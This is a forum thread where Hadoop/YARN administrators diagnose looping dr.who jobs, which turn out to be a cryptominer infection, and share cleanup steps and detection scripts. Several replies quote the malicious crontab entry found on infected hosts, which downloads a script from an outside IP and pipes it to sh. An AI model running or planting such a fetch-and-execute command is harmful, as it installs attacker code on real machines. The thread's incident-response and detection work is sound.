Created 05-02-2018 09:19 AM
We're running an HDP 2.5 cluster, and today we noticed a series of dr.who "MYYARN" applications running, failing, and then resubmitting to YARN again and again, in what seems to be an "infinite loop". We can't figure out what the applications are doing or why they are failing. Any thoughts? Many thanks in advance!
Created 05-18-2018 09:43 PM
I experienced the problem on a new cluster: it was flooded with strange jobs from nowhere. In my case, the following was found in the crontab of the 'yarn' user on each host:
*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
So the suggestion is to first check 'sudo -u yarn crontab -l' (or maybe 'sudo -u dr.who crontab -l'). I still don't know how it was infected.
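To repeat that check across several accounts, something like the following could work. This is only a sketch: the function names and the grep pattern are my own assumptions, and the pattern only catches the "download piped into a shell" style of entry shown above, so it is not a complete malware signature.

```shell
#!/usr/bin/env bash

# Print crontab lines (read from stdin) that pipe a downloaded script
# straight into a shell. The pattern is illustrative, not exhaustive.
suspicious_cron_lines() {
  grep -E '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh' || true
}

# Check the crontab of each user given as an argument and prefix any
# suspicious line with the user name.
check_users() {
  local user
  for user in "$@"; do
    # crontab -l (or sudo) fails when the user has no crontab or does
    # not exist as an OS account, so errors are silenced.
    sudo -u "$user" crontab -l 2>/dev/null \
      | suspicious_cron_lines \
      | awk -v u="$user" '{ print u ": " $0 }'
  done
}
```

Running 'check_users yarn hdfs' on each host would print any matching entries; the user list is an assumption and should be adjusted to the service accounts on your cluster.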
Created 05-25-2018 08:36 PM
I ran into something like this recently on a POC cluster. A "yarn" process was consuming 100% of the CPU on multiple servers. We shut down all of the HDP services via Ambari to make sure there weren't any rogue HDP processes running, but this "yarn" process was still running.
It turns out it was a process running this:
/var/tmp/java -c /var/tmp/w.conf
Killing the process with "kill -9" only stopped it for a few seconds before it respawned. Removing the "/var/tmp/java" file also worked only for a few seconds before the file returned.
We ended up looking at crontab and found this:
$ sudo -u yarn crontab -e
*/2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
We removed the crontab entry, killed the running process, and removed the java file on all nodes. The processes no longer returned, and we restarted the HDP cluster via Ambari. The root cause appeared to be security group rules on AWS allowing access to the cluster.
I've seen variations of this reported out of /tmp/java and using "h.conf" instead of "w.conf".
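Since the binary can show up under either /tmp or /var/tmp, one way to spot it is to list every process whose executable lives in a temp directory. The sketch below is Linux-only (it reads /proc), the function names are made up for illustration, and a hit is only a candidate for closer inspection, not proof of infection.

```shell
#!/usr/bin/env bash

# Filter "PID EXE_PATH" lines on stdin, keeping only executables that
# live under /tmp or /var/tmp.
in_temp_dir() {
  awk '$2 ~ /^\/(var\/)?tmp\//'
}

# Print "PID EXE_PATH" for every process whose /proc/PID/exe link is
# readable. Run as root to see processes owned by other users.
list_process_exes() {
  local d exe
  for d in /proc/[0-9]*; do
    exe=$(readlink "$d/exe" 2>/dev/null) || continue
    printf '%s %s\n' "${d#/proc/}" "$exe"
  done
}
```

Running 'list_process_exes | in_temp_dir' as root on each node lists the candidates. If the file has already been deleted while the process is still running, the path is shown with a " (deleted)" suffix and still matches.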
Created 07-10-2018 03:19 PM
I solved this problem by changing the owner and permissions of the dr.who path:
chown -R root:root /var/log/hadoop/yarn/local/usercache/dr.who
chmod -R 400 /var/log/hadoop/yarn/local/usercache/dr.who
or
chown -R root:root /hadoop/yarn/local/usercache/dr.who
chmod -R 400 /hadoop/yarn/local/usercache/dr.who
Now the NodeManagers no longer stop because of this problem.
Created 08-14-2018 10:47 AM
Facing a similar issue, where the shell script is being used to download and create the cron entry.
Created 08-14-2018 11:51 AM
@venu gopal Please refer to this thread: https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html